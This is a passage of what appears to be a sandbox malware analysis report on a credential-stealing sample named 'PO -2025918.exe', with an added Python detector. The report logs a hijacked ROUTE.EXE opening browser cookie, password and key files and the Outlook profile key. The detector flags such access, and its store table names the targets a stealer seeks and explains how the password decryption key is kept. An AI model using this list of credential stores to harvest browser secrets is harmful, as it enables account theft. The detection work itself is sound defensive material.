Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

Source: Yara match File source: 4.2.PO -2025918.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.PO -2025918.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.2125323216.0000000001A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2124637174.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3540022925.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3539953830.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3543046045.0000000005840000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2126495744.0000000002050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3540990423.0000000002980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0.2.PO -2025918.exe.7040000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PO -2025918.exe.3777590.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PO -2025918.exe.7040000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PO -2025918.exe.2b71520.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PO -2025918.exe.3777590.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PO -2025918.exe.2b71520.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PO -2025918.exe.294f714.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1870856601.0000000003759000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1892212304.0000000007040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1865271514.00000000027A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\ROUTE.EXE File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\ROUTE.EXE File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\ROUTE.EXE File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\ROUTE.EXE File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\ROUTE.EXE File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\ROUTE.EXE File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\ROUTE.EXE File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\ROUTE.EXE File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\ROUTE.EXE Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
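The point of the lines above is not which files were touched but who touched them: the Chromium cookie, password, autofill and key-material stores and the Outlook MAPI profile key are opened by C:\Windows\SysWOW64\ROUTE.EXE, a legitimate Windows binary, rather than by the sample. The following script is an added example, not part of the Joe Sandbox report, that runs that check over the report's own behaviour lines: any process outside a small owner allow-list opening a credential store is a finding. The store table and the allow-list (chrome.exe, msedge.exe, outlook.exe) are assumptions for the example; the two benign input lines at the end are constructed for contrast and are not from the report. Matching is on the path tail on purpose, because stealers probe several candidate locations (the report shows Local State tried under Default\ and Default\Network\, neither of which is where Chrome keeps that file; it lives one level up in User Data\).

```python
import re

# Credential stores a stealer goes after, keyed by the tail of the path (lower
# case). Assumed table for this example; extend it for Firefox, Thunderbird etc.
CREDENTIAL_STORES = {
    "\\login data": "saved passwords (Chromium SQLite, values encrypted with the Local State key)",
    "\\cookies": "session cookies",
    "\\web data": "autofill and payment data",
    "\\local state": "DPAPI-wrapped AES key that decrypts passwords and cookies",
    "\\windows messaging subsystem\\profiles\\outlook": "Outlook MAPI profile (mail account credentials)",
}

# Image names that legitimately open these stores for their own data. Anything
# else touching them is a finding. Assumed allow-list for the example.
ALLOWED_OWNERS = {"chrome.exe", "msedge.exe", "outlook.exe"}

# "Source: <image path> File opened: <path>" or "Key opened: <key>", optionally
# followed by the report's "Jump to behavior" link text.
LINE_RE = re.compile(
    r"^\s*Source:\s+(?P<proc>.+?\.exe)\s+(?P<verb>File opened|Key opened):\s+"
    r"(?P<target>.+?)(?:\s+Jump to behavior)?\s*$",
    re.IGNORECASE,
)


def parse_access(line):
    """Return (image name, verb, target) for a file/key access line, else None."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    image = m.group("proc").rsplit("\\", 1)[-1].lower()
    return image, m.group("verb").lower(), m.group("target")


def classify_store(target):
    """Name the credential store a path or registry key belongs to, else None."""
    t = target.lower()
    for tail, what in CREDENTIAL_STORES.items():
        if tail in t:
            return what
    return None


def find_credential_theft(lines, allowed=ALLOWED_OWNERS):
    """Credential-store accesses by processes that have no business making them."""
    findings = []
    for line in lines:
        parsed = parse_access(line)
        if parsed is None:
            continue
        image, verb, target = parsed
        store = classify_store(target)
        if store is None or image in allowed:
            continue
        findings.append({"process": image, "verb": verb, "target": target, "store": store})
    return findings


# Behaviour lines copied from the report above, plus two constructed benign
# lines (a browser reading its own store, and a font query) that must not fire.
REPORT_LINES = [
    r"Source: C:\Windows\SysWOW64\ROUTE.EXE File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior",
    r"Source: C:\Windows\SysWOW64\ROUTE.EXE File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior",
    r"Source: C:\Windows\SysWOW64\ROUTE.EXE File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior",
    r"Source: C:\Windows\SysWOW64\ROUTE.EXE File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior",
    r"Source: C:\Windows\SysWOW64\ROUTE.EXE File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior",
    r"Source: C:\Windows\SysWOW64\ROUTE.EXE File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior",
    r"Source: C:\Windows\SysWOW64\ROUTE.EXE File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior",
    r"Source: C:\Windows\SysWOW64\ROUTE.EXE File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior",
    r"Source: C:\Windows\SysWOW64\ROUTE.EXE Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior",
    # constructed, not from the report:
    r"Source: C:\Program Files\Google\Chrome\Application\chrome.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data",
    r"Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior",
]

if __name__ == "__main__":
    for f in find_credential_theft(REPORT_LINES):
        print(f"{f['process']:<12} {f['verb']:<12} {f['store']}\n    {f['target']}")
```

On a live host the same predicate runs over EDR file-open telemetry or Windows object-access audit events (4663 with a SACL on the browser profile directory) instead of sandbox lines; keying on the accessing image rather than the file name is what catches a payload that has been injected into a signed system binary, as here.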

Remote Access Functionality

Source: Yara match File source: 4.2.PO -2025918.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.PO -2025918.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.2125323216.0000000001A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2124637174.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3540022925.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3539953830.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3543046045.0000000005840000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2126495744.0000000002050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3540990423.0000000002980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0.2.PO -2025918.exe.7040000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PO -2025918.exe.3777590.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PO -2025918.exe.7040000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PO -2025918.exe.2b71520.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PO -2025918.exe.3777590.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PO -2025918.exe.2b71520.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PO -2025918.exe.294f714.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1870856601.0000000003759000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1892212304.0000000007040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1865271514.00000000027A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY